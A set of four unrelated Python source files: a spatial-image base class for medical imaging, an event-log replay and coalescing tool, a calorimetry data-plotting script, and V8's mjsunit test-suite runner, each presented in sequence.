``fname``, where the derivation may differ between formats.
* to_files() - save image to files with which the image is already
associated. Or ``img.to_files(files)`` saves to the files passed.
classmethods:
* from_filename(fname) - make instance by loading from filename
* instance_to_filename(img, fname) - save ``img`` instance to
filename ``fname``.
There are several ways of writing data.
=======================================
There is the usual way, which is the default::
img.to_filename(fname)
and that is, to take the data encapsulated by the image and cast it to
the datatype the header expects, setting any available header scaling
into the header to help the data match.
You can load the data into an image from file with::
img.from_filename(fname)
The image stores its associated files in a rather secretive way. In
order to just save an image, for which you know there is an associated
filename, or other storage, you can do::
img.to_files()
alternatively, you can pass in the needed files yourself, into this
method, as an argument.
You can get the data out again with of::
img.get_data(fileobj)
Less commonly, for some image types that support it, you might want to
fetch out the unscaled array via the header::
unscaled_data = img.get_unscaled_data()
Analyze-type images (including nifti) support this, but others may not
(MINC, for example).
Sometimes you might to avoid any loss of precision by making the
data type the same as the input::
hdr = img.get_header()
hdr.set_data_dtype(data.dtype)
img.to_filename(fname)
'''
import warnings
class SpatialImage(object):
_header_maker = dict
''' Template class for images '''
def __init__(self, data, affine, header=None, extra=None):
if extra is None:
extra = {}
self._data = data
self._affine = affine
self.extra = extra
self._set_header(header)
self._files = {}
def __str__(self):
shape = self.get_shape()
affine = self.get_affine()
return '\n'.join((
str(self.__class__),
'data shape %s' % (shape,),
'affine: ',
'%s' % affine,
'metadata:',
'%s' % self._header))
def get_data(self):
return self._data
def get_shape(self):
if self._data:
return self._data.shape
def get_data_dtype(self):
raise NotImplementedError
def set_data_dtype(self, dtype):
raise NotImplementedError
def get_affine(self):
return self._affine
def get_header(self):
return self._header
def _set_header(self, header=None):
if header is None:
self._header = self._header_maker()
return
# we need to replicate the endianness, for the case where we are
# creating an image from files, and we have not yet loaded the
# data. In that case we need to have the header maintain its
# endianness to get the correct interpretation of the data
self._header = self._header_maker(endianness=header.endianness)
for key, value in header.items():
if key in self._header:
self._header[key] = value
elif key not in self.extra:
self.extra[key] = value
@classmethod
def from_filename(klass, filename):
files = klass.filespec_to_files(filename)
return klass.from_files(files)
@classmethod
def from_filespec(klass, img, filespec):
warnings.warn('``from_filespec`` class method is deprecated\n'
'Please use the ``from_filename`` class method '
'instead',
DeprecationWarning)
klass.from_filespec(filespec)
def from_files(klass, files):
raise NotImplementedError
def from_image(klass, img):
raise NotImplementedError
@staticmethod
def filespec_to_files(filespec):
raise NotImplementedError
def to_filename(self, filename):
''' Write image to files implied by filename string
Paraameters
-----------
filename : str
filename to which to save image. We will parse `filename`
with ``filespec_to_files`` to work out names for image,
header etc.
Returns
-------
None
'''
files = self.filespec_to_files(filename)
self.to_files(files)
def to_filespec(self, filename):
warnings.warn('``to_filespec`` is deprecated, please '
'use ``to_filename`` instead',
DeprecationWarning)
self.to_filename(filename)
def to_files(self, files=None):
raise NotImplementedError
@classmethod
def load(klass, filename):
return klass.from_filename(filename)
@classmethod
def save(klass, img, filename):
warnings.warn('``save`` class method is deprecated\n'
'You probably want the ``to_filename`` instance '
'method, or the module-level ``save`` function',
DeprecationWarning)
klass.instance_to_filename(img, filename)
@classmethod
def instance_to_filename(klass, img, filename):
''' Save `img` in our own format, to name implied by `filename`
This is a class method
Parameters
----------
img : ``spatialimage`` instance
In fact, an object with the API of ``spatialimage`` -
specifically ``get_data``, ``get_affine``, ``get_header`` and
``extra``.
filename : str
Filename, implying name to which to save image.
'''
img = klass.from_image(img)
img.to_filename(filename)
@classmethod
def from_image(klass, img):
''' Create new instance of own class from `img`
This is a class method
Parameters
----------
img : ``spatialimage`` instance
In fact, an object with the API of ``spatialimage`` -
specifically ``get_data``, ``get_affine``, ``get_header`` and
``extra``.
Returns
-------
cimg : ``spatialimage`` instance
Image, of our own class
'''
return klass(img.get_data(),
img.get_affine(),
img.get_header(),
img.extra)
| |
#
# $LicenseInfo:firstyear=2010&license=mit$
#
# Copyright (c) 2010, Linden Research, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# $/LicenseInfo$
#
import heapq
import re
import sys
from mergetools import imerge
from timestamp import TimeStamp
__all__ = [
'Event',
'CoalescedEvent',
'Sequence',
'parse_stanza',
'EventReader',
'input_events',
'FollowSequences',
'CoalesceSequences'
]
headerRE = re.compile(r'^(\d+\.\d+)\t([\d.:]+)\t(\S+)\t(\w+)$')
breakRE = re.compile(r'^\*{3,}$')
class Event(object):
# state values
Query = 'QueryStart'
Response = 'QueryResponse'
End = 'Quit'
def __init__(self, time, id, source, state, body):
self.time = time
if type(time) is not TimeStamp:
self.time = TimeStamp(time)
self.id = id
self.source = source
self.state = state
self.body = body
def __cmp__(self, other):
c = cmp(self.time, other.time)
if c == 0:
if self.state == "Quit" and other.state != "Quit":
return 1
if self.state != "Quit" and other.state == "Quit":
return -1
return c
def __str__(self):
return ("%s\t%s\t%s\t%s\n%s\n**************************************\n"
% (self.time, self.id, self.source, self.state, self.body))
def events(self):
es = []
for event in self.body.split("\n+++\n"):
parts = event.split(":", 1)
if len(parts) == 2:
(time, body) = parts
status = Event.Query
if body == "Quit":
status = Event.End
es.append(Event(time, self.id, self.source, status, body))
return es
class CoalescedEvent(Event):
Sequence = 'Sequence'
def __init__(self, shelf_life=None, max_life=None):
self.time = None
self.id = None
self.source = None
self.state = CoalescedEvent.Sequence
self.body = ""
self.ended = False
self.lasttime = None
self.staletime = None
self.maxtime = None
self.shelf_life = None
if shelf_life:
self.shelf_life = TimeStamp(shelf_life)
self.max_life = None
if max_life:
self.max_life = TimeStamp(max_life)
def add(self, event):
if self.time is None:
self.time = event.time
if self.max_life:
self.maxtime = self.time + self.max_life
self.id = event.id
self.source = event.source
self.lasttime = event.time
if self.shelf_life:
self.staletime = self.lasttime + self.shelf_life
if not event.state == Event.End:
self.body += "%s:%s\n+++\n" % (event.time, event.body)
else:
self.body += "%s:Quit\n+++\n" % (event.time)
self.ended = True
def endIfNeeded(self):
if not self.ended:
self.add(Event(self.lasttime, self.id, self.source,
Event.End, 'Quit'))
def parse_stanza(input):
match = None
while not match:
line = input.readline()
if line == '': # empty string means EOF
return None
match = headerRE.match(line)
(time, id, source, state) = match.groups()
body = ''
while True:
line = input.readline()
if line == '':
break
if breakRE.match(line):
break
body += line
return Event(float(time), id, source, state, body)
class Sequence(object):
def __init__(self):
self._count = 0
self._time_start = None
self._last_event = None
def note(self, event):
self._count += 1
if self._time_start is None:
self._time_start = event.time
self._last_event = event
def count(self):
return self._count
def time(self):
return self._last_event.time - self._time_start
def timeto(self, event):
if self._last_event is None:
return None
return event.time - self._last_event.time
def ended(self):
return self._last_event.state == Event.End
def generateEnd(self, t=None):
e = self._last_event
if t is None:
t = e.time
return Event(t, e.id, e.source, Event.End, "")
class EventReader(object):
def __init__(self, input):
self._input = input
def __iter__(self):
while True:
s = parse_stanza(self._input)
if s is None:
return
if s.state == CoalescedEvent.Sequence:
for t in s.events():
yield t
else:
yield s
def input_spec_to_file(spec):
if spec == '-':
return sys.stdin
return file(spec)
def input_events(specs):
if len(specs) == 0:
return iter(EventReader(sys.stdin))
evs = map(EventReader, map(input_spec_to_file, specs))
return imerge(*evs)
class FollowSequences(object):
def replay(self, events):
connections = { }
lastt = None;
for e in events:
id = e.id
lastt = e.time
if id not in connections:
s = connections[id] = Sequence()
self.addingSequence(s, e)
else:
s = connections[id]
self.notingEvent(s, e)
s.note(e)
if s.ended():
self.removingSequence(s, e)
del connections[id]
if False:
expired = []
for (id,s) in connections.iteritems():
w = s.timeto(e)
if w and float(w) > 60.0:
expired.append((id,s))
for (id,s) in expired:
f = s.generateEnd(e.time)
self.forcedEnd(s, f)
self.removingSequence(s, f)
del connections[id]
for s in connections.itervalues():
f = s.generateEnd(lastt)
self.forcedEnd(s, f)
self.removingSequence(s, f)
def addingSequence(self, s, e):
pass
def notingEvent(self, s, e):
pass
def forcedEnd(self, s, e):
pass
def removingSequence(self, s, e):
pass
class CoalesceSequences(object):
def __init__(self):
self.connections = { }
self.bytime = [ ]
self.starttime = None
self.lasttime = None
def heartbeat(self, n):
sys.stderr.write("%s: %d events... (%d connections, %d waiting)\n"
% (str(self.lasttime - self.starttime), n, len(self.connections), len(self.bytime)))
n = 0
i = 0
l = len(self.bytime)
s = ""
while n < 5 and i < l:
en = 0
while i < l and self.bytime[i].ended:
en += 1
i += 1
if en > 0:
s += " : --%d--" % en
else:
n += 1
s += " : %s(%s)" % (self.bytime[i].id, str(self.lasttime - self.bytime[i].lasttime))
i += 1
sys.stderr.write(" ")
sys.stderr.write(s)
sys.stderr.write("\n")
def age_out(self, c):
if c.staletime and self.lasttime >= c.staletime:
sys.stderr.write(" expiring %s, stale\n" % c.id)
elif c.maxtime and self.lasttime >= c.maxtime:
sys.stderr.write(" expiring %s, maxed out\n" % c.id)
else:
return False
c.endIfNeeded()
del self.connections[c.id]
return True
def flush_completed(self):
bytime = self.bytime
while bytime:
c = bytime[0]
if not c.ended:
if not self.age_out(c):
return
heapq.heappop(bytime)
self.fullSequence(c)
# sys.stderr.write(" done %s\n" % c.id)
def replay(self, events):
n = 0;
connections = self.connections
bytime = self.bytime
for e in events:
id = e.id
self.lasttime = e.time
if self.starttime is None:
self.starttime = self.lasttime
n += 1
if n % 10000 == 0:
self.heartbeat(n)
if id in connections:
c = connections[id]
self.age_out(c)
if id not in connections:
c = connections[id] = CoalescedEvent(30.0, 180.0)
c.add(e)
heapq.heappush(bytime, c)
else:
c.add(e)
if e.state == Event.End:
del connections[id]
self.flush_completed()
for d in connections.itervalues():
d.endIfNeeded()
self.flush_completed()
def fullSequence(self, e):
pass
| |
import time, copy
import os
import sys
import numpy
import h5py
#from PnSC_ui import *
#from PnSC_dataimport import *
from PnSC_SCui import *
#from PnSC_math import *
from PnSC_h5io import *
from PnSC_main import *
from matplotlib.ticker import FuncFormatter
import scipy.integrate
#celllist=[1, 2]+range(4, 21)+[22]+[24, 25]
celllist=[11]
for selectcell in celllist:
print selectcell
p='C:/Users/JohnnyG/Documents/PythonCode/Vlassak/NanoCalorimetry/AuSiCu_pnsc_all.h5'
def myexpformat(x, pos):
for ndigs in range(2):
lab=(('%.'+'%d' %ndigs+'e') %x).replace('e+0','e').replace('e+','e').replace('e0','').replace('e-0','e-')
if eval(lab)==x:
return lab
return lab
ExpTickLabels=FuncFormatter(myexpformat)
def make_ticklabels_invisible(ax, x=True, y=True):
if x:
for tl in ax.get_xticklabels():
tl.set_visible(False)
if y:
for tl in ax.get_yticklabels():
tl.set_visible(False)
def heatrate_T(d, T, Twin=10.):
#i=numpy.argmin((T-d['sampletemperature'])**2)
Ta=d['sampletemperature'][cycleindex]
x=numpy.where((Ta>=T-Twin)&(Ta<=T+Twin))[0]
prev=numpy.array([not (t-1 in x) for t in x])
previ=numpy.where(prev)[0]
if len(previ)==0:
return 0.
stopi=numpy.append(previ[1:],len(x))
longestbunchind=numpy.argmax(stopi-previ)
inds=x[previ[longestbunchind]:stopi[longestbunchind]]
return d['sampleheatrate'][cycleindex][inds].mean()
def findenthalpyandpinacles(segdict, critenth=1.e-5, dTmin=.4, Tmeanmin=100.):
T=segdict['sampletemperature'][cycleindex]
C=segdict['sampleheatcapacity'][cycleindex]
nci=numpy.where((C[:-1]>0.)&(C[1:]<=0.))[0]#neg crossings
pci=numpy.where((C[1:]>0.)&(C[:-1]<=0.))[0]#pos crossings
ci=numpy.sort(numpy.concatenate([nci, pci]))
ans=[]
for i, j in zip(ci[:-1], ci[1:]):
enth=scipy.integrate.trapz(C[i:j], T[i:j])
if numpy.abs(enth)>critenth and (T[j]-T[i])>dTmin:
itemp=numpy.argmax(numpy.abs(C[i:j]))
Tmean=scipy.integrate.trapz(C[i:j]*T[i:j], T[i:j])/scipy.integrate.trapz(C[i:j], T[i:j])
if Tmean<Tmeanmin:
continue
ans+=[dict([('enthalpy', enth), ('T_Cmax', T[i:j][itemp]), ('Cmax', C[i:j][itemp]), ('Tweightedmean', Tmean), ('cycindstart', i), ('cycindstop', j)])]
return ans
nskip=100
cycleindex=0
#p=mm.h5path
#f=h5py.File(p, mode='r+')
#f=h5py.File(p, mode='r')
savef='C:/Users/JohnnyG/Documents/HarvardWork/MG/PnSCplots/batchplotbycell_Aug28/'
plotTlim=(50., 700.)
metadictlist=[]
allsegdict=[]
f=h5py.File(p, mode='r')
if not `selectcell` in f['calbycellmetadata']:
print 'no cal data for ', selectcell
f.close()
continue
cg=f['calbycellmetadata'][`selectcell`]
for mg in cg.itervalues():
if isinstance(mg, h5py.Group) and 'Cpregions_enthalpy' in mg.attrs.keys():
d={}
for k, v in mg.attrs.iteritems():
d[k]=v
# if selectcell==1 and d['name'].startswith('heat1'):#heat1a was botched and heat1b we don't know cooling rate and the XRd for heat0 was questionable anyway
# continue
metadictlist+=[d]
allsegdict+=[CreateHeatProgSegDictList(p, d['name'], d['h5hpname'])]
xrddictlist=[]
if 'xrdbycell' in f and `selectcell` in f['xrdbycell']:
cg=f['xrdbycell'][`selectcell`]
for mg in cg.itervalues():
if isinstance(mg, h5py.Group):
d={}
for k, v in mg.attrs.iteritems():
d[k]=v
xrddictlist+=[d]
f.close()
orderarray=numpy.abs(numpy.array([metadict['prevcoolrate_320C'] for metadict in metadictlist]))
sortinds=numpy.argsort(orderarray)
cols=['b', (160./256.,160./256.,0), 'r', 'g', 'c', 'm', 'k']
## plotting series of heat ramps
mult=1.e6
nplots=len(orderarray)
pylab.figure(figsize=(8, 8))
axl=[pylab.subplot(nplots, 1, nplots)]
for i in range(1, nplots):
#ax=pylab.subplot2grid((n, 3), (n-1-i, 0), colspan=2, sharex=axl[0], sharey=axl[0])
#ax=pylab.subplot(nplots, 1, nplots-i, sharex=axl[0], sharey=axl[0])
ax=pylab.subplot(nplots, 1, nplots-i, sharex=axl[0])
pylab.setp(ax.get_xticklabels(), visible=False)
axl+=[ax]
namestack=[]
for count, i in enumerate(sortinds):
hpsdl=allsegdict[i]
metadict=metadictlist[i]
namestack+=[metadict['name']]
namestack='_'.join(namestack)
ymin, ymax=None, None
for count, i in enumerate(sortinds):
hpsdl=allsegdict[i]
metadict=metadictlist[i]
print metadict['name']
T=hpsdl[metadict['heatseg']]['sampletemperature'][cycleindex]
C=hpsdl[metadict['heatseg']]['sampleheatcapacity'][cycleindex]
tp=hpsdl[metadict['heatseg']]['cyclepartition'][cycleindex]
PdT=hpsdl[metadict['heatseg']]['samplepowerperrate'][cycleindex]
if selectcell==10 and metadict['name']=='heat2':
C=C[T<680]
T=T[T<680]
tp=tp[T<680]
PdT=PdT[T<680]
if selectcell==4 and metadict['name']=='heat1a':
print T.max()
C=C[T<615]
T=T[T<615]
tp=tp[T<615]
PdT=PdT[T<615]
if selectcell==4 and metadict['name']=='heat1b':
print T.max()
C=C[T<665]
T=T[T<665]
tp=tp[T<665]
PdT=PdT[T<665]
if selectcell==20 and metadict['name']=='heat1a':
print T.max()
C=C[T<665]
T=T[T<665]
tp=tp[T<665]
PdT=PdT[T<665]
if selectcell==20 and metadict['name']=='heat2':
print T.max()
C=C[T<635]
T=T[T<635]
tp=tp[T<635]
PdT=PdT[T<635]
##Cp plots
# axl[count].plot(T, mult*C, '-', color=cols[count], lw=1, label=metadict['name'])
#
# rxnindlist=[metadict['Cpregions_glassind'], metadict['Cpregions_xtalind'], metadict['Cpregions_meltind'], metadict['Cpregions_melt2ind']]
# for regind, (enth, Tp, Cp, Tmean, i, j) in enumerate(zip(metadict['Cpregions_enthalpy'], metadict['Cpregions_T_Cmax'], metadict['Cpregions_Cmax'], metadict['Cpregions_Tweightedmean'], metadict['Cpregions_cycindstart'], metadict['Cpregions_cycindstop'])):
# if regind in rxnindlist:
# col=cols[count]
# #col=['b', 'g', 'r'][rxnindlist.index(regind)]
# hatch=['/', '\\', '+', '+'][rxnindlist.index(regind)]
# else:
# continue
# axl[count].fill(T[i:j], mult*C[i:j], color=col, hatch=hatch, alpha=0.3)
# #axl[count].plot(Tp, mult*Cp, 'kx')
# #axl[count].plot(Tmean, 0, 'k*')
# pylab.subplots_adjust(right=.95, top=0.95, hspace=0.01)
# for ax in axl:
# if selectcell==1:
# ax.set_ylim(-1.2, 5.4)
# ax.set_yticks([-1, 0, 2, 4])
# elif selectcell==2:
# ax.set_ylim(-.9, 8.6)
# ax.set_yticks([0, 2, 4, 6])
# elif selectcell==4:
# ax.set_ylim(-2.5, 11.8)
# ax.set_yticks([-2, 0, 2, 4, 6, 8])
# elif selectcell==5:
# ax.set_ylim(-2.6, 8.7)
# ax.set_yticks([-2, 0, 2, 4, 6])
# elif selectcell==8:
# ax.set_ylim(-1.1, 7.6)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==12:
# ax.set_ylim(-1.8, 6.8)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==13:
# ax.set_ylim(-1.6, 7.)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==14:
# ax.set_ylim(-1.8, 6.7)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==18:
# ax.set_ylim(-1.1, 5.7)
# ax.set_yticks([-1, 0, 2, 4])
# elif selectcell==20:
# ax.set_ylim(-2.1, 5.9)
# ax.set_yticks([-2, 0, 2, 4])
# else:
# ax.set_ylim(-2.1, 4.9)
# ax.set_yticks([-2, 0, 2, 4])
# ax.set_xlim(plotTlim)
# axl[2].set_ylabel(r'Heat Capacity ($\mu$J/K), endothermic ->', fontsize=14)
# axl[0].set_xlabel('Temperature (C)', fontsize=14)
# headname='Cpstack'
##****
#Cp fit plots
colors=['k']+['b', 'g', 'm', 'y', 'c']*5
for i in range(-1, tp.max()+1):
if i<0:
al=0.5
else:
al=1.
if numpy.any(tp==i):
axl[count].plot(T[tp==i], mult*PdT[tp==i], '.', markersize=1, color=colors[i+1], alpha=al)
axl[count].plot(T, mult*(PdT-C), '-', color='r', lw=1)
temp=PdT[(T>plotTlim[0])&(T<plotTlim[1])]
if ymin is None:
ymin=temp.min()
ymax=temp.max()
else:
ymin=min(ymin, temp.min())
ymax=max(ymax, temp.max())
print mult*ymax
axl[count].set_ylim(mult*ymin, mult*ymax)
ymin*=mult
ymax*=mult
for ax in axl:
#ax.set_ylim(ymin, ymax)
# temp=[yv for l in ax.get_lines() for xd, yd in l.get_data() for yv in yd]
# ax.set_ylim(min(temp), max(temp))
ax.set_xlim(plotTlim)
headname='Cpfitstack'
axl[2].set_ylabel(r'Power per heat rate ($\mu$J/K)', fontsize=14)
axl[0].set_xlabel('Temperature (C)', fontsize=14)
pylab.subplots_adjust(right=.95, top=0.95, hspace=0.01)
if selectcell==11:
axl[0].set_ylim(2., 6.5)
axl[0].set_yticks([2, 3, 4, 5, 6])
axl[1].set_ylim(2., 8.3)
axl[3].set_ylim(2., 13.9)
axl[4].set_ylim(2., 9.9)
#****
#pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), '%s_cell%02d_%s.png' %(headname, selectcell, namestack)))
###BELOW ARE THE EXTRA DATA PLOTS
# #only show xrd data if the prevname pnsc scan was the last performed before an xrd experiment
# phasecomps=[]
# for metadict in metadictlist:
# pcal=metadict['prevname'][:5]
# cal=metadict['name'][:5]
# c=numpy.zeros(3)
# if pcal!=cal:#if previous scan was in same heat# as scan then there was no xrd in between
# for d in xrddictlist:
# if d['name']==pcal:#use xrd that happened after the prev scan
# c=numpy.float32([d['amfrac'], d['othfrac'], d['fccfrac']])
# c=c/c.sum()
# print c
# break
# phasecomps+=[c]
#
# ##barplot
# pylab.figure(figsize=(3, 8))
# listofarraysorderedwithmetadictlist=phasecomps
# axl=[pylab.subplot(nplots, 1, nplots)]
# for i in range(1, nplots):
# #ax=pylab.subplot2grid((n, 3), (n-1-i, 0), colspan=2, sharex=axl[0], sharey=axl[0])
# ax=pylab.subplot(nplots, 1, nplots-i, sharex=axl[0], sharey=axl[0])
# pylab.setp(ax.get_xticklabels(), visible=False)
# axl+=[ax]
# maxval=0.
# for count, i in enumerate(sortinds):
# arr=listofarraysorderedwithmetadictlist[i]
# maxval=max(maxval,numpy.max(arr))
# axl[count].barh(range(len(arr)),arr,color=['y','g','r'],height=1)
# for ax in axl:
# ax.set_ylim(-.5, len(arr)+.5)
# ax.set_xlim((0., maxval*1.1))
# make_ticklabels_invisible(ax, x=False)
# axl[0].set_xlabel('phase fraction', fontsize=14)
# pylab.subplots_adjust(right=.95, top=0.95, hspace=0.01)
#
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'PhaseConcstack_cell%02d.png' %(selectcell)))
#
# #hatchlegend
# pylab.figure()
# for hatch, lab in zip(['/', '\\', '+'], ['glass trans.', 'crystallization', 'melting']):
# pylab.fill([0, 1, 0], [0, 1, 1], color='k', hatch=hatch, alpha=0.3, label=lab)
# pylab.legend()
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'CpRegionLegend_cell%02d_%s.png' %(selectcell, metadict['name'])))
#
# #plot cooling rates
# pylab.figure(figsize=(2, 8))
# for count, i in enumerate(sortinds):
# pylab.semilogx(numpy.abs(metadictlist[i]['prevcoolrate_320C']), count, 'o', color=cols[count], markersize=11)
# make_ticklabels_invisible(pylab.gca(), x=False)
# pylab.xlabel('cooling rate\nat 320C (K/s)', fontsize=14)
# pylab.ylim(-.5, count+.5)
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'Cool320Cstack_cell%02d.png' %(selectcell)))
#
## ##plot cooling rates
## pylab.figure(figsize=(2, 8))
## for count, i in enumerate(sortinds):
## pylab.semilogx(numpy.abs(metadictlist[i]['prevcoolrate_180C']), count, 'o', color=cols[count], markersize=11)
## make_ticklabels_invisible(pylab.gca(), x=False)
## pylab.xlabel('cooling rate\nat 180C (K/s)', fontsize=14)
## pylab.ylim(-.5, count+.5)
## pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'Cool180Cstack_cell%02d.png' %(selectcell)))
#
# ##plot heat rates
# pylab.figure(figsize=(2, 8))
# for count, i in enumerate(sortinds):
# pylab.semilogx(numpy.abs(metadictlist[i]['heatrate_170C500C']), count, 'o', color=cols[count], markersize=11)
# make_ticklabels_invisible(pylab.gca(), x=False)
# pylab.xlabel('heating rate (K/s)', fontsize=14)
# pylab.ylim(-.5, count+.5)
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'HeatRatestack_cell%02d.png' %(selectcell)))
pylab.show()
print 'done'
| |
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from collections import OrderedDict
import itertools
import os
import re
from testrunner.local import statusfile
from testrunner.local import testsuite
from testrunner.objects import testcase
from testrunner.outproc import base as outproc
FILES_PATTERN = re.compile(r"//\s+Files:(.*)")
ENV_PATTERN = re.compile(r"//\s+Environment Variables:(.*)")
SELF_SCRIPT_PATTERN = re.compile(r"//\s+Env: TEST_FILE_NAME")
MODULE_PATTERN = re.compile(r"^// MODULE$", flags=re.MULTILINE)
NO_HARNESS_PATTERN = re.compile(r"^// NO HARNESS$", flags=re.MULTILINE)
# Flags known to misbehave when combining arbitrary mjsunit tests. Can also
# be compiled regular expressions.
COMBINE_TESTS_FLAGS_BLACKLIST = [
'--check-handle-count',
'--enable-tracing',
re.compile('--experimental.*'),
'--expose-trigger-failure',
re.compile('--harmony.*'),
'--mock-arraybuffer-allocator',
'--print-ast',
re.compile('--trace.*'),
'--wasm-lazy-compilation',
]
class TestSuite(testsuite.TestSuite):
def ListTests(self):
tests = []
for dirname, dirs, files in os.walk(self.root, followlinks=True):
for dotted in [x for x in dirs if x.startswith('.')]:
dirs.remove(dotted)
dirs.sort()
files.sort()
for filename in files:
if (filename.endswith(".js") and
filename != "mjsunit.js" and
filename != "mjsunit_suppressions.js"):
fullpath = os.path.join(dirname, filename)
relpath = fullpath[len(self.root) + 1 : -3]
testname = relpath.replace(os.path.sep, "/")
test = self._create_test(testname)
tests.append(test)
return tests
def _test_combiner_class(self):
return TestCombiner
def _test_class(self):
return TestCase
def _suppressed_test_class(self):
return SuppressedTestCase
class TestCase(testcase.D8TestCase):
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
source = self.get_source()
files_list = [] # List of file names to append to command arguments.
files_match = FILES_PATTERN.search(source);
# Accept several lines of 'Files:'.
while True:
if files_match:
files_list += files_match.group(1).strip().split()
files_match = FILES_PATTERN.search(source, files_match.end())
else:
break
files = [ os.path.normpath(os.path.join(self.suite.root, '..', '..', f))
for f in files_list ]
testfilename = os.path.join(self.suite.root,
self.path + self._get_suffix())
if SELF_SCRIPT_PATTERN.search(source):
files = (
["-e", "TEST_FILE_NAME=\"%s\"" % testfilename.replace("\\", "\\\\")] +
files)
if NO_HARNESS_PATTERN.search(source):
mjsunit_files = []
else:
mjsunit_files = [os.path.join(self.suite.root, "mjsunit.js")]
files_suffix = []
if MODULE_PATTERN.search(source):
files_suffix.append("--module")
files_suffix.append(testfilename)
self._source_files = files
self._source_flags = self._parse_source_flags(source)
self._mjsunit_files = mjsunit_files
self._files_suffix = files_suffix
self._env = self._parse_source_env(source)
def _parse_source_env(self, source):
env_match = ENV_PATTERN.search(source)
env = {}
if env_match:
for env_pair in env_match.group(1).strip().split():
var, value = env_pair.split('=')
env[var] = value
return env
def _get_source_flags(self):
return self._source_flags
def _get_files_params(self):
files = list(self._source_files)
if not self._test_config.no_harness:
files += self._mjsunit_files
files += self._files_suffix
if self._test_config.isolates:
files += ['--isolate'] + files
return files
def _get_cmd_env(self):
return self._env
def _get_source_path(self):
return os.path.join(self.suite.root, self.path + self._get_suffix())
class TestCombiner(testsuite.TestCombiner):
def get_group_key(self, test):
"""Combine tests with the same set of flags.
Ignore:
1. Some special cases where it's not obvious what to pass in the command.
2. Tests with flags that can cause failure even inside try-catch wrapper.
3. Tests that use async functions. Async functions can be scheduled after
exiting from try-catch wrapper and cause failure.
"""
if (len(test._files_suffix) > 1 or
test._env or
not test._mjsunit_files or
test._source_files):
return None
source_flags = test._get_source_flags()
if ('--expose-trigger-failure' in source_flags or
'--throws' in source_flags):
return None
source_code = test.get_source()
# Maybe we could just update the tests to await all async functions they
# call?
if 'async' in source_code:
return None
# TODO(machenbach): Remove grouping if combining tests in a flag-independent
# way works well.
return 1
def _combined_test_class(self):
return CombinedTest
class CombinedTest(testcase.D8TestCase):
"""Behaves like normal mjsunit tests except:
1. Expected outcome is always PASS
2. Instead of one file there is a try-catch wrapper with all combined tests
passed as arguments.
"""
def __init__(self, name, tests):
super(CombinedTest, self).__init__(tests[0].suite, '', name,
tests[0]._test_config)
self._tests = tests
def _prepare_outcomes(self, force_update=True):
self._statusfile_outcomes = outproc.OUTCOMES_PASS_OR_TIMEOUT
self.expected_outcomes = outproc.OUTCOMES_PASS_OR_TIMEOUT
def _get_shell_flags(self):
"""In addition to standard set of shell flags it appends:
--disable-abortjs: %AbortJS can abort the test even inside
trycatch-wrapper, so we disable it.
--es-staging: We blacklist all harmony flags due to false positives,
but always pass the staging flag to cover the mature features.
--omit-quit: Calling quit() in JS would otherwise early terminate.
--quiet-load: suppress any stdout from load() function used by
trycatch-wrapper.
"""
return [
'--test',
'--disable-abortjs',
'--es-staging',
'--omit-quit',
'--quiet-load',
]
def _get_cmd_params(self):
return (
super(CombinedTest, self)._get_cmd_params() +
['tools/testrunner/trycatch_loader.js', '--'] +
self._tests[0]._mjsunit_files +
['--'] +
[t._files_suffix[0] for t in self._tests]
)
